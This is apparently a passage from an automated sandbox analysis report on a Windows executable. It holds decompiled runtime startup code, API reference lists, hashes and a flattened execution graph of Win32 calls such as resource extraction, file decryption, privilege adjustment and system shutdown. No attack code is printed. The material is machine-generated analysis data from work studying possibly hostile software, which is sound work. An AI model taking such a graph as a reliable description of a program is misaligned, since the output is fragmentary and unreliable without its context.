                                                          				void* _t6;
                                                          				intOrPtr _t11;
                                                          				intOrPtr _t12;
                                                          
                                                          				 *0x10c81f8 = E010C6C70();
                                                          				__set_app_type(E010C6FBE(2));
                                                          				 *0x10c88a4 =  *0x10c88a4 | 0xffffffff;
                                                          				 *0x10c88a8 =  *0x10c88a8 | 0xffffffff;
                                                          				_t4 = __p__fmode();
                                                          				_t11 =  *0x10c8528; // 0x0
                                                          				 *_t4 = _t11;
                                                          				_t5 = __p__commode();
                                                          				_t12 =  *0x10c851c; // 0x0
                                                          				 *_t5 = _t12;
                                                          				_t6 = E010C7000();
                                                          				if( *0x10c8000 == 0) {
                                                          					__setusermatherr(E010C7000);
                                                          				}
                                                          				E010C71EF(_t6);
                                                          				return 0;
                                                          			}








                                                          0x010c69b7
                                                          0x010c69c2
                                                          0x010c69c8
                                                          0x010c69cf
                                                          0x010c69d8
                                                          0x010c69de
                                                          0x010c69e4
                                                          0x010c69e6
                                                          0x010c69ec
                                                          0x010c69f2
                                                          0x010c69f4
                                                          0x010c6a00
                                                          0x010c6a07
                                                          0x010c6a0d
                                                          0x010c6a0e
                                                          0x010c6a15

                                                          APIs
                                                            • Part of subcall function 010C6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010C6FC5
                                                          • __set_app_type.MSVCRT ref: 010C69C2
                                                          • __p__fmode.MSVCRT ref: 010C69D8
                                                          • __p__commode.MSVCRT ref: 010C69E6
                                                          • __setusermatherr.MSVCRT ref: 010C6A07
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                          • String ID:
                                                          • API String ID: 1632413811-0
                                                          • Opcode ID: 1696639e1554738819c5208441eec10a68a87de68eaec45fa5e45282898162f8
                                                          • Instruction ID: 180d498bad0f9709baddc6af494db168a930f810efbc9288849d35cad3b6e8e8
                                                          • Opcode Fuzzy Hash: 1696639e1554738819c5208441eec10a68a87de68eaec45fa5e45282898162f8
                                                          • Instruction Fuzzy Hash: 58F0F874604326CFC778AB38E50D6493BA2FB54721B20860EE8E2862D8DB7F81458F18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:26.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:967
                                                          Total number of Limit Nodes:42
                                                          execution_graph 2196 1096f40 SetUnhandledExceptionFilter 2197 1094cc0 GlobalFree 3128 1094200 3129 109420b SendMessageA 3128->3129 3130 109421e 3128->3130 3129->3130 3131 1093100 3132 1093111 3131->3132 3133 10931b0 3131->3133 3135 109311d 3132->3135 3136 1093149 GetDesktopWindow 3132->3136 3134 10931b9 SendDlgItemMessageA 3133->3134 3139 1093141 3133->3139 3134->3139 3137 1093138 EndDialog 3135->3137 3135->3139 3141 10943d0 6 API calls 3136->3141 3137->3139 3143 1094463 SetWindowPos 3141->3143 3144 1096ce0 4 API calls 3143->3144 3145 109315d 6 API calls 3144->3145 3145->3139 3146 1094bc0 3148 1094c05 3146->3148 3149 1094bd7 3146->3149 3147 1094c1b SetFilePointer 3147->3149 3148->3147 3148->3149 3150 10930c0 3151 10930de CallWindowProcA 3150->3151 3152 10930ce 3150->3152 3153 10930da 3151->3153 3152->3151 3152->3153 3154 10963c0 3155 1096407 3154->3155 3156 109658a CharPrevA 3155->3156 3157 1096415 CreateFileA 3156->3157 3158 1096448 WriteFile 3157->3158 3159 109643a 3157->3159 3160 1096465 CloseHandle 3158->3160 3162 1096ce0 4 API calls 3159->3162 3160->3159 3163 109648f 3162->3163 3164 1096c03 3165 1096c1e 3164->3165 3166 1096c17 _exit 3164->3166 3167 1096c27 _cexit 3165->3167 3168 1096c32 3165->3168 3166->3165 3167->3168 2198 1094ad0 2206 1093680 2198->2206 2201 1094ae9 2202 1094aee WriteFile 2203 1094b0f 2202->2203 2204 1094b14 2202->2204 2204->2203 2205 1094b3b SendDlgItemMessageA 2204->2205 2205->2203 2207 1093691 MsgWaitForMultipleObjects 2206->2207 2208 10936a9 PeekMessageA 2207->2208 2209 10936e8 2207->2209 2208->2207 2210 10936bc 2208->2210 2209->2201 2209->2202 2210->2207 2210->2209 2211 10936c7 DispatchMessageA 2210->2211 2212 10936d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 1094cd0 2214 1094d0b 2213->2214 2215 1094cf4 2213->2215 2216 1094d02 2214->2216 2219 1094dcb 2214->2219 2222 1094d25 2214->2222 2215->2216 2217 1094b60 FindCloseChangeNotification 2215->2217 2270 1096ce0 2216->2270 2217->2216 2220 1094dd4 SetDlgItemTextA 2219->2220 2223 1094de3 2219->2223 2220->2223 2221 1094e95 2222->2216 2236 1094c37 2222->2236 2223->2216 2244 109476d 2223->2244 2227 1094e38 2227->2216 2253 1094980 2227->2253 2232 1094e64 2261 10947e0 LocalAlloc 2232->2261 2235 1094e6f 2235->2216 2237 1094c88 2236->2237 2238 1094c4c DosDateTimeToFileTime 2236->2238 2237->2216 2241 1094b60 2237->2241 2238->2237 2239 1094c5e LocalFileTimeToFileTime 2238->2239 2239->2237 2240 1094c70 SetFileTime 2239->2240 2240->2237 2242 1094b92 FindCloseChangeNotification 2241->2242 2243 1094b76 SetFileAttributesA 2241->2243 2242->2243 2243->2216 2275 10966ae GetFileAttributesA 2244->2275 2246 109477b 2246->2227 2247 10947cc SetFileAttributesA 2248 10947db 2247->2248 2248->2227 2252 10947c2 2252->2247 2254 1094990 2253->2254 2255 10949c2 lstrcmpA 2254->2255 2256 10949a5 2254->2256 2258 10949ba 2255->2258 2259 1094a0e 2255->2259 2257 10944b9 20 API calls 2256->2257 2257->2258 2258->2216 2258->2232 2259->2258 2340 109487a 2259->2340 2262 109480f LocalAlloc 2261->2262 2263 10947f6 2261->2263 2266 109480b 2262->2266 2267 1094831 2262->2267 2264 10944b9 20 API calls 2263->2264 2264->2266 2266->2235 2268 10944b9 20 API calls 2267->2268 2269 1094846 LocalFree 2268->2269 2269->2266 2271 1096ce8 2270->2271 2272 1096ceb 2270->2272 2271->2221 2353 1096cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2272->2353 2274 1096e26 2274->2221 2276 1094777 2275->2276 2276->2246 2276->2247 2277 1096517 FindResourceA 2276->2277 2278 109656b 2277->2278 2279 1096536 LoadResource 2277->2279 2284 10944b9 2278->2284 2279->2278 2280 1096544 DialogBoxIndirectParamA FreeResource 2279->2280 2280->2278 2282 10947b1 2280->2282 2282->2247 2282->2248 2282->2252 2285 109455a 2284->2285 2286 10944fe LoadStringA 2284->2286 2289 1096ce0 4 API calls 2285->2289 2287 1094562 2286->2287 2288 1094527 2286->2288 2293 10945c9 2287->2293 2299 109457e 2287->2299 2313 109681f 2288->2313 2291 1094689 2289->2291 2291->2282 2296 10945cd LocalAlloc 2293->2296 2297 1094607 LocalAlloc 2293->2297 2294 1094536 MessageBoxA 2294->2285 2296->2285 2301 10945f3 2296->2301 2297->2285 2307 10945c4 2297->2307 2299->2299 2303 1094596 LocalAlloc 2299->2303 2304 109171e _vsnprintf 2301->2304 2302 109462d MessageBeep 2305 109681f 10 API calls 2302->2305 2303->2285 2306 10945af 2303->2306 2304->2307 2308 109463b 2305->2308 2330 109171e 2306->2330 2307->2302 2310 1094645 MessageBoxA LocalFree 2308->2310 2311 10967c9 EnumResourceLanguagesA 2308->2311 2310->2285 2311->2310 2314 1096857 GetVersionExA 2313->2314 2323 109691a 2313->2323 2316 109687c 2314->2316 2314->2323 2315 1096ce0 4 API calls 2317 109452c 2315->2317 2318 10968a5 GetSystemMetrics 2316->2318 2316->2323 2317->2294 2324 10967c9 2317->2324 2319 10968b5 RegOpenKeyExA 2318->2319 2318->2323 2320 10968d6 RegQueryValueExA RegCloseKey 2319->2320 2319->2323 2321 109690c 2320->2321 2320->2323 2334 10966f9 2321->2334 2323->2315 2325 10967e2 2324->2325 2326 1096803 2324->2326 2338 1096793 EnumResourceLanguagesA 2325->2338 2326->2294 2328 10967f5 2328->2326 2339 1096793 EnumResourceLanguagesA 2328->2339 2331 109172d 2330->2331 2332 109173d _vsnprintf 2331->2332 2333 109175d 2331->2333 2332->2333 2333->2307 2335 109670f 2334->2335 2336 1096740 CharNextA 2335->2336 2337 109674b 2335->2337 2336->2335 2337->2323 2338->2328 2339->2326 2341 10948a2 CreateFileA 2340->2341 2343 10948e9 2341->2343 2344 1094908 2341->2344 2343->2344 2345 10948ee 2343->2345 2344->2258 2348 109490c 2345->2348 2349 10948f5 CreateFileA 2348->2349 2351 1094917 2348->2351 2349->2344 2350 1094962 CharNextA 2350->2351 2351->2349 2351->2350 2352 1094953 CreateDirectoryA 2351->2352 2352->2350 2353->2274 3169 1093210 3170 1093227 3169->3170 3194 109328e EndDialog 3169->3194 3171 10933e2 GetDesktopWindow 3170->3171 3172 1093235 3170->3172 3175 10943d0 11 API calls 3171->3175 3174 1093239 3172->3174 3176 10932dd GetDlgItemTextA 3172->3176 3177 109324c 3172->3177 3178 10933f1 SetWindowTextA SendDlgItemMessageA 3175->3178 3183 1093366 3176->3183 3188 10932fc 3176->3188 3180 1093251 3177->3180 3181 10932c5 EndDialog 3177->3181 3178->3174 3179 109341f GetDlgItem EnableWindow 3178->3179 3179->3174 3180->3174 3182 109325c LoadStringA 3180->3182 3181->3174 3184 109327b 3182->3184 3185 1093294 3182->3185 3186 10944b9 20 API calls 3183->3186 3190 10944b9 20 API calls 3184->3190 3207 1094224 LoadLibraryA 3185->3207 3186->3174 3188->3183 3189 1093331 GetFileAttributesA 3188->3189 3192 109337c 3189->3192 3193 109333f 3189->3193 3190->3194 3196 109658a CharPrevA 3192->3196 3197 10944b9 20 API calls 3193->3197 3194->3174 3195 10932a5 SetDlgItemTextA 3195->3174 3195->3184 3198 109338d 3196->3198 3199 1093351 3197->3199 3200 10958c8 27 API calls 3198->3200 3199->3174 3201 109335a CreateDirectoryA 3199->3201 3202 1093394 3200->3202 3201->3183 3201->3192 3202->3183 3203 10933a4 3202->3203 3204 10933c7 EndDialog 3203->3204 3205 109597d 34 API calls 3203->3205 3204->3174 3206 10933c3 3205->3206 3206->3174 3206->3204 3208 1094246 GetProcAddress 3207->3208 3211 10943b2 3207->3211 3209 109425d GetProcAddress 3208->3209 3210 10943a4 FreeLibrary 3208->3210 3209->3210 3213 1094274 GetProcAddress 3209->3213 3210->3211 3212 10944b9 20 API calls 3211->3212 3215 109329d 3212->3215 3213->3210 3214 109428b 3213->3214 3216 1094295 GetTempPathA 3214->3216 3221 10942e1 3214->3221 3215->3174 3215->3195 3217 10942ad 3216->3217 3217->3217 3218 10942b4 CharPrevA 3217->3218 3219 10942d0 CharPrevA 3218->3219 3218->3221 3219->3221 3220 1094390 FreeLibrary 3220->3215 3221->3220 3222 1094a50 3223 1094a9f ReadFile 3222->3223 3224 1094a66 3222->3224 3225 1094abb 3223->3225 3224->3225 3226 1094a82 memcpy 3224->3226 3226->3225 3227 1093450 3228 109345e 3227->3228 3229 10934d3 EndDialog 3227->3229 3230 109349a GetDesktopWindow 3228->3230 3235 1093465 3228->3235 3231 109346a 3229->3231 3232 10943d0 11 API calls 3230->3232 3233 10934ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3232->3233 3233->3231 3234 109348c EndDialog 3234->3231 3235->3231 3235->3234 3236 1096bef _XcptFilter 2354 1094ca0 GlobalAlloc 2355 1096a60 2372 1097155 2355->2372 2357 1096a65 2358 1096a76 GetStartupInfoW 2357->2358 2359 1096a93 2358->2359 2360 1096aa8 2359->2360 2361 1096aaf Sleep 2359->2361 2362 1096ac7 _amsg_exit 2360->2362 2364 1096ad1 2360->2364 2361->2359 2362->2364 2363 1096b13 _initterm 2370 1096b2e __IsNonwritableInCurrentImage 2363->2370 2364->2363 2366 1096af4 2364->2366 2364->2370 2365 1096bd6 _ismbblead 2365->2370 2367 1096c1e 2367->2366 2369 1096c27 _cexit 2367->2369 2369->2366 2370->2365 2370->2367 2371 1096bbe exit 2370->2371 2377 1092bfb GetVersion 2370->2377 2371->2370 2373 109717a 2372->2373 2374 109717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2374 2373->2374 2375 10971e2 2373->2375 2376 10971cd 2374->2376 2375->2357 2376->2375 2378 1092c0f 2377->2378 2379 1092c50 2377->2379 2378->2379 2380 1092c13 GetModuleHandleW 2378->2380 2394 1092caa memset memset memset 2379->2394 2380->2379 2382 1092c22 GetProcAddress 2380->2382 2382->2379 2391 1092c34 2382->2391 2384 1092c8e 2385 1092c9e 2384->2385 2386 1092c97 CloseHandle 2384->2386 2385->2370 2386->2385 2391->2379 2392 1092c89 2489 1091f90 2392->2489 2506 109468f FindResourceA SizeofResource 2394->2506 2397 1092d2d CreateEventA SetEvent 2398 109468f 7 API calls 2397->2398 2400 1092d57 2398->2400 2399 10944b9 20 API calls 2401 1092f06 2399->2401 2402 1092d5b 2400->2402 2403 1092d7d 2400->2403 2405 1096ce0 4 API calls 2401->2405 2406 10944b9 20 API calls 2402->2406 2404 1092e1f 2403->2404 2407 109468f 7 API calls 2403->2407 2511 1095c9e 2404->2511 2408 1092c62 2405->2408 2410 1092d6e 2406->2410 2411 1092d9f 2407->2411 2408->2384 2435 1092f1d 2408->2435 2410->2401 2411->2402 2415 1092da3 CreateMutexA 2411->2415 2413 1092e3a 2416 1092e43 2413->2416 2417 1092e52 FindResourceA 2413->2417 2414 1092e30 2414->2399 2415->2404 2418 1092dbd GetLastError 2415->2418 2537 1092390 2416->2537 2421 1092e6e 2417->2421 2422 1092e64 LoadResource 2417->2422 2418->2404 2420 1092dca 2418->2420 2423 1092dea 2420->2423 2424 1092dd5 2420->2424 2421->2410 2552 10936ee GetVersionExA 2421->2552 2422->2421 2426 10944b9 20 API calls 2423->2426 2425 10944b9 20 API calls 2424->2425 2427 1092de8 2425->2427 2428 1092dff 2426->2428 2430 1092e04 CloseHandle 2427->2430 2428->2404 2428->2430 2430->2401 2434 1096517 24 API calls 2434->2410 2436 1092f6c 2435->2436 2437 1092f3f 2435->2437 2661 1095164 2436->2661 2439 1092f5f 2437->2439 2641 10951e5 2437->2641 2794 1093a3f 2439->2794 2441 1092f71 2444 1093041 2441->2444 2676 10955a0 2441->2676 2448 1096ce0 4 API calls 2444->2448 2450 1092c6b 2448->2450 2449 1092f86 GetSystemDirectoryA 2451 109658a CharPrevA 2449->2451 2476 10952b6 2450->2476 2452 1092fab LoadLibraryA 2451->2452 2453 1092fc0 GetProcAddress 2452->2453 2454 1092ff7 FreeLibrary 2452->2454 2453->2454 2457 1092fd6 DecryptFileA 2453->2457 2455 1093017 SetCurrentDirectoryA 2454->2455 2456 1093006 2454->2456 2458 1093054 2455->2458 2459 1093026 2455->2459 2456->2455 2726 109621e GetWindowsDirectoryA 2456->2726 2457->2454 2464 1092ff0 2457->2464 2460 1093061 2458->2460 2737 1093b26 2458->2737 2462 10944b9 20 API calls 2459->2462 2460->2444 2466 109307a 2460->2466 2746 109256d 2460->2746 2468 1093037 2462->2468 2464->2454 2472 1093098 2466->2472 2757 1093ba2 2466->2757 2813 1096285 GetLastError 2468->2813 2472->2444 2473 10930af 2472->2473 2815 1094169 2473->2815 2478 10952d6 2476->2478 2486 1095316 2476->2486 2477 1095300 LocalFree LocalFree 2477->2478 2477->2486 2478->2477 2481 10952eb SetFileAttributesA DeleteFileA 2478->2481 2479 109538c 2482 1096ce0 4 API calls 2479->2482 2480 1095374 2480->2479 3124 1091fe1 2480->3124 2481->2477 2484 1092c72 2482->2484 2484->2384 2484->2392 2485 109535e SetCurrentDirectoryA 2488 1092390 13 API calls 2485->2488 2486->2480 2486->2485 2487 10965e8 4 API calls 2486->2487 2487->2485 2488->2480 2490 1091f9a 2489->2490 2491 1091f9f 2489->2491 2493 1091ea7 15 API calls 2490->2493 2492 1091fc0 2491->2492 2494 10944b9 20 API calls 2491->2494 2497 1091fd9 2491->2497 2495 1091ee2 GetCurrentProcess OpenProcessToken 2492->2495 2496 1091fcf ExitWindowsEx 2492->2496 2492->2497 2493->2491 2494->2492 2499 1091f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2501 1091f0e 2495->2501 2496->2497 2497->2384 2500 1091f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 1091f1f 2500->2502 2503 10944b9 20 API calls 2501->2503 2504 1096ce0 4 API calls 2502->2504 2503->2502 2505 1091f8c 2504->2505 2505->2384 2507 1092d1a 2506->2507 2508 10946b6 2506->2508 2507->2397 2507->2414 2508->2507 2509 10946be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 10946df memcpy_s FreeResource 2509->2510 2510->2507 2518 1095e17 2511->2518 2520 1095cc3 2511->2520 2512 1095dd0 2516 1095dec GetModuleFileNameA 2512->2516 2512->2518 2513 1096ce0 4 API calls 2514 1092e2c 2513->2514 2514->2413 2514->2414 2515 1095ced CharNextA 2515->2520 2517 1095e0a 2516->2517 2516->2518 2587 10966c8 2517->2587 2518->2513 2520->2512 2520->2515 2520->2518 2521 1096218 2520->2521 2524 1095e36 CharUpperA 2520->2524 2530 1095f9f CharUpperA 2520->2530 2531 1095f59 CompareStringA 2520->2531 2532 1096003 CharUpperA 2520->2532 2533 109667f IsDBCSLeadByte CharNextA 2520->2533 2534 1095edc CharUpperA 2520->2534 2535 10960a2 CharUpperA 2520->2535 2592 109658a 2520->2592 2596 1096e2a 2521->2596 2524->2520 2525 10961d0 2524->2525 2526 10944b9 20 API calls 2525->2526 2527 10961e7 2526->2527 2528 10961f0 CloseHandle 2527->2528 2529 10961f7 ExitProcess 2527->2529 2528->2529 2530->2520 2531->2520 2532->2520 2533->2520 2534->2520 2535->2520 2538 10924cb 2537->2538 2541 10923b9 2537->2541 2539 1096ce0 4 API calls 2538->2539 2540 10924dc 2539->2540 2540->2410 2541->2538 2542 10923e9 FindFirstFileA 2541->2542 2542->2538 2543 1092407 2542->2543 2544 1092479 2543->2544 2545 1092421 lstrcmpA 2543->2545 2546 10924a9 FindNextFileA 2543->2546 2550 109658a CharPrevA 2543->2550 2551 1092390 5 API calls 2543->2551 2548 1092488 SetFileAttributesA DeleteFileA 2544->2548 2545->2546 2547 1092431 lstrcmpA 2545->2547 2546->2543 2549 10924bd FindClose RemoveDirectoryA 2546->2549 2547->2543 2547->2546 2548->2546 2549->2538 2550->2543 2551->2543 2553 109372d 2552->2553 2557 1093737 2552->2557 2554 10944b9 20 API calls 2553->2554 2566 10939fc 2553->2566 2554->2566 2555 1096ce0 4 API calls 2556 1092e92 2555->2556 2556->2401 2556->2410 2567 10918a3 2556->2567 2557->2553 2559 10938a4 2557->2559 2557->2566 2603 10928e8 2557->2603 2559->2553 2560 10939c1 MessageBeep 2559->2560 2559->2566 2561 109681f 10 API calls 2560->2561 2562 10939ce 2561->2562 2563 10939d8 MessageBoxA 2562->2563 2564 10967c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2555 2568 10918d5 2567->2568 2573 10919b8 2567->2573 2632 10917ee LoadLibraryA 2568->2632 2570 1096ce0 4 API calls 2571 10919d5 2570->2571 2571->2410 2571->2434 2573->2570 2574 10918e5 GetCurrentProcess OpenProcessToken 2574->2573 2575 1091900 GetTokenInformation 2574->2575 2576 1091918 GetLastError 2575->2576 2577 10919aa CloseHandle 2575->2577 2576->2577 2578 1091927 LocalAlloc 2576->2578 2577->2573 2579 10919a9 2578->2579 2580 1091938 GetTokenInformation 2578->2580 2579->2577 2581 109194e AllocateAndInitializeSid 2580->2581 2582 10919a2 LocalFree 2580->2582 2581->2582 2586 109196e 2581->2586 2582->2579 2583 1091999 FreeSid 2583->2582 2584 1091975 EqualSid 2585 109198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2590 10966d5 2587->2590 2588 10966f3 2588->2518 2590->2588 2591 10966e5 CharNextA 2590->2591 2599 1096648 2590->2599 2591->2590 2593 109659b 2592->2593 2594 10965ab 2593->2594 2595 10965b8 CharPrevA 2593->2595 2594->2520 2595->2594 2602 1096cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 109621d 2600 109665d IsDBCSLeadByte 2599->2600 2601 1096668 2599->2601 2600->2601 2601->2590 2602->2598 2604 1092a62 2603->2604 2610 109290d 2603->2610 2605 1092a6e GlobalFree 2604->2605 2606 1092a75 2604->2606 2605->2606 2606->2559 2608 1092955 GlobalAlloc 2608->2604 2609 1092968 GlobalLock 2608->2609 2609->2604 2609->2610 2610->2604 2610->2608 2611 1092a20 GlobalUnlock 2610->2611 2612 1092a80 GlobalUnlock 2610->2612 2613 1092773 2610->2613 2611->2610 2612->2604 2614 10927a3 CharUpperA CharNextA CharNextA 2613->2614 2615 10928b2 2613->2615 2616 10927db 2614->2616 2617 10928b7 GetSystemDirectoryA 2614->2617 2615->2617 2618 10928a8 GetWindowsDirectoryA 2616->2618 2619 10927e3 2616->2619 2620 10928bf 2617->2620 2618->2620 2625 109658a CharPrevA 2619->2625 2621 10928d2 2620->2621 2622 109658a CharPrevA 2620->2622 2623 1096ce0 4 API calls 2621->2623 2622->2621 2624 10928e2 2623->2624 2624->2610 2626 1092810 RegOpenKeyExA 2625->2626 2626->2620 2627 1092837 RegQueryValueExA 2626->2627 2628 109289a RegCloseKey 2627->2628 2629 109285c 2627->2629 2628->2620 2630 1092867 ExpandEnvironmentStringsA 2629->2630 2631 109287a 2629->2631 2630->2631 2631->2628 2633 1091890 2632->2633 2634 1091826 GetProcAddress 2632->2634 2635 1096ce0 4 API calls 2633->2635 2636 1091889 FreeLibrary 2634->2636 2637 1091839 AllocateAndInitializeSid 2634->2637 2638 109189f 2635->2638 2636->2633 2637->2636 2639 109185f FreeSid 2637->2639 2638->2573 2638->2574 2639->2636 2642 109468f 7 API calls 2641->2642 2643 10951f9 LocalAlloc 2642->2643 2644 109522d 2643->2644 2645 109520d 2643->2645 2647 109468f 7 API calls 2644->2647 2646 10944b9 20 API calls 2645->2646 2648 109521e 2646->2648 2649 109523a 2647->2649 2650 1096285 GetLastError 2648->2650 2651 109523e 2649->2651 2652 1095262 lstrcmpA 2649->2652 2660 1095223 2650->2660 2653 10944b9 20 API calls 2651->2653 2654 109527e 2652->2654 2655 1095272 LocalFree 2652->2655 2657 109524f LocalFree 2653->2657 2656 10944b9 20 API calls 2654->2656 2658 1092f4d 2655->2658 2659 1095290 LocalFree 2656->2659 2657->2658 2658->2436 2658->2439 2658->2444 2659->2660 2660->2658 2662 109468f 7 API calls 2661->2662 2663 1095175 2662->2663 2664 109517a 2663->2664 2665 10951af 2663->2665 2666 10944b9 20 API calls 2664->2666 2667 109468f 7 API calls 2665->2667 2668 109518d 2666->2668 2669 10951c0 2667->2669 2668->2441 2828 1096298 2669->2828 2673 10951ce 2675 10944b9 20 API calls 2673->2675 2674 10951e1 2674->2441 2675->2668 2677 109468f 7 API calls 2676->2677 2678 10955c7 LocalAlloc 2677->2678 2679 10955db 2678->2679 2680 10955fd 2678->2680 2682 10944b9 20 API calls 2679->2682 2681 109468f 7 API calls 2680->2681 2684 109560a 2681->2684 2683 10955ec 2682->2683 2685 1096285 GetLastError 2683->2685 2686 109560e 2684->2686 2687 1095632 lstrcmpA 2684->2687 2709 10955f1 2685->2709 2688 10944b9 20 API calls 2686->2688 2689 109564b LocalFree 2687->2689 2690 1095645 2687->2690 2691 109561f LocalFree 2688->2691 2692 109565b 2689->2692 2693 1095696 2689->2693 2690->2689 2714 10955f6 2691->2714 2698 1095467 49 API calls 2692->2698 2694 109589f 2693->2694 2697 10956ae GetTempPathA 2693->2697 2695 1096517 24 API calls 2694->2695 2695->2714 2696 1096ce0 4 API calls 2699 1092f7e 2696->2699 2700 10956eb 2697->2700 2701 10956c3 2697->2701 2702 1095678 2698->2702 2699->2444 2699->2449 2707 109586c GetWindowsDirectoryA 2700->2707 2708 1095717 GetDriveTypeA 2700->2708 2700->2714 2840 1095467 2701->2840 2704 1095680 2702->2704 2702->2714 2706 10944b9 20 API calls 2704->2706 2706->2709 2874 109597d GetCurrentDirectoryA SetCurrentDirectoryA 2707->2874 2710 1095730 GetFileAttributesA 2708->2710 2724 109572b 2708->2724 2709->2714 2710->2724 2714->2696 2715 1095467 49 API calls 2715->2700 2716 1092630 21 API calls 2716->2724 2718 10957c1 GetWindowsDirectoryA 2718->2724 2719 109597d 34 API calls 2719->2724 2720 109658a CharPrevA 2721 10957e8 GetFileAttributesA 2720->2721 2722 10957fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 1095827 SetFileAttributesA 2723->2724 2724->2707 2724->2708 2724->2710 2724->2714 2724->2716 2724->2718 2724->2719 2724->2720 2724->2723 2725 1095467 49 API calls 2724->2725 2870 1096952 2724->2870 2725->2724 2727 1096249 2726->2727 2728 1096268 2726->2728 2729 10944b9 20 API calls 2727->2729 2730 109597d 34 API calls 2728->2730 2731 109625a 2729->2731 2732 1096277 2730->2732 2733 1096285 GetLastError 2731->2733 2734 1096ce0 4 API calls 2732->2734 2735 109625f 2733->2735 2736 1093013 2734->2736 2735->2732 2736->2444 2736->2455 2738 1093b2d 2737->2738 2739 1093b72 2738->2739 2740 1093b53 2738->2740 2941 1094fe0 2739->2941 2742 1096517 24 API calls 2740->2742 2743 1093b70 2742->2743 2744 1096298 10 API calls 2743->2744 2745 1093b7b 2743->2745 2744->2745 2745->2460 2747 1092583 2746->2747 2748 1092622 2746->2748 2750 10925e8 RegOpenKeyExA 2747->2750 2751 109258b 2747->2751 2971 10924e0 GetWindowsDirectoryA 2748->2971 2752 1092609 RegQueryInfoKeyA 2750->2752 2753 10925e3 2750->2753 2751->2753 2755 109259b RegOpenKeyExA 2751->2755 2754 10925d1 RegCloseKey 2752->2754 2753->2466 2754->2753 2755->2753 2756 10925bc RegQueryValueExA 2755->2756 2756->2754 2758 1093bdb 2757->2758 2766 1093bec 2757->2766 2759 109468f 7 API calls 2758->2759 2759->2766 2760 1093c03 memset 2760->2766 2761 1093d13 2763 10944b9 20 API calls 2761->2763 2762 109468f 7 API calls 2762->2766 2790 1093d26 2763->2790 2765 1096ce0 4 API calls 2767 1093f60 2765->2767 2766->2760 2766->2761 2766->2762 2768 1093d7b CompareStringA 2766->2768 2769 1093f4d 2766->2769 2770 1093fd7 2766->2770 2772 1093fab 2766->2772 2775 1093f1e LocalFree 2766->2775 2776 1093f46 LocalFree 2766->2776 2780 1093cc7 CompareStringA 2766->2780 2791 1093e10 2766->2791 2979 1091ae8 2766->2979 3019 109202a memset memset RegCreateKeyExA 2766->3019 3045 1093fef 2766->3045 2767->2472 2768->2766 2768->2770 2769->2765 2770->2769 3069 1092267 2770->3069 2774 10944b9 20 API calls 2772->2774 2778 1093fbe LocalFree 2774->2778 2775->2766 2775->2770 2776->2769 2778->2769 2780->2766 2781 1093e1f GetProcAddress 2784 1093f64 2781->2784 2781->2791 2782 1093f92 2783 10944b9 20 API calls 2782->2783 2785 1093fa9 2783->2785 2786 10944b9 20 API calls 2784->2786 2787 1093f7c LocalFree 2785->2787 2788 1093f75 FreeLibrary 2786->2788 2789 1096285 GetLastError 2787->2789 2788->2787 2789->2790 2790->2769 2791->2781 2791->2782 2792 1093eff FreeLibrary 2791->2792 2793 1093f40 FreeLibrary 2791->2793 3059 1096495 2791->3059 2792->2775 2793->2776 2795 109468f 7 API calls 2794->2795 2796 1093a55 LocalAlloc 2795->2796 2797 1093a6c 2796->2797 2798 1093a8e 2796->2798 2799 10944b9 20 API calls 2797->2799 2800 109468f 7 API calls 2798->2800 2801 1093a7d 2799->2801 2802 1093a98 2800->2802 2803 1096285 GetLastError 2801->2803 2804 1093a9c 2802->2804 2805 1093ac5 lstrcmpA 2802->2805 2811 1092f64 2803->2811 2806 10944b9 20 API calls 2804->2806 2807 1093ada 2805->2807 2808 1093b0d LocalFree 2805->2808 2809 1093aad LocalFree 2806->2809 2810 1096517 24 API calls 2807->2810 2808->2811 2809->2811 2812 1093aec LocalFree 2810->2812 2811->2436 2811->2444 2812->2811 2814 109303c 2813->2814 2814->2444 2816 109468f 7 API calls 2815->2816 2817 109417d LocalAlloc 2816->2817 2818 10941a8 2817->2818 2819 1094195 2817->2819 2820 109468f 7 API calls 2818->2820 2821 10944b9 20 API calls 2819->2821 2822 10941b5 2820->2822 2823 10941a6 2821->2823 2824 10941b9 2822->2824 2825 10941c5 lstrcmpA 2822->2825 2823->2444 2827 10944b9 20 API calls 2824->2827 2825->2824 2826 10941e6 LocalFree 2825->2826 2826->2823 2827->2826 2829 109171e _vsnprintf 2828->2829 2839 10962c9 FindResourceA 2829->2839 2831 10962cb LoadResource LockResource 2832 1096353 2831->2832 2835 10962e0 2831->2835 2833 1096ce0 4 API calls 2832->2833 2834 10951ca 2833->2834 2834->2673 2834->2674 2836 109631b FreeResource 2835->2836 2837 1096355 FreeResource 2835->2837 2838 109171e _vsnprintf 2836->2838 2837->2832 2838->2839 2839->2831 2839->2832 2841 109548a 2840->2841 2859 109551a 2840->2859 2901 10953a1 2841->2901 2843 1095581 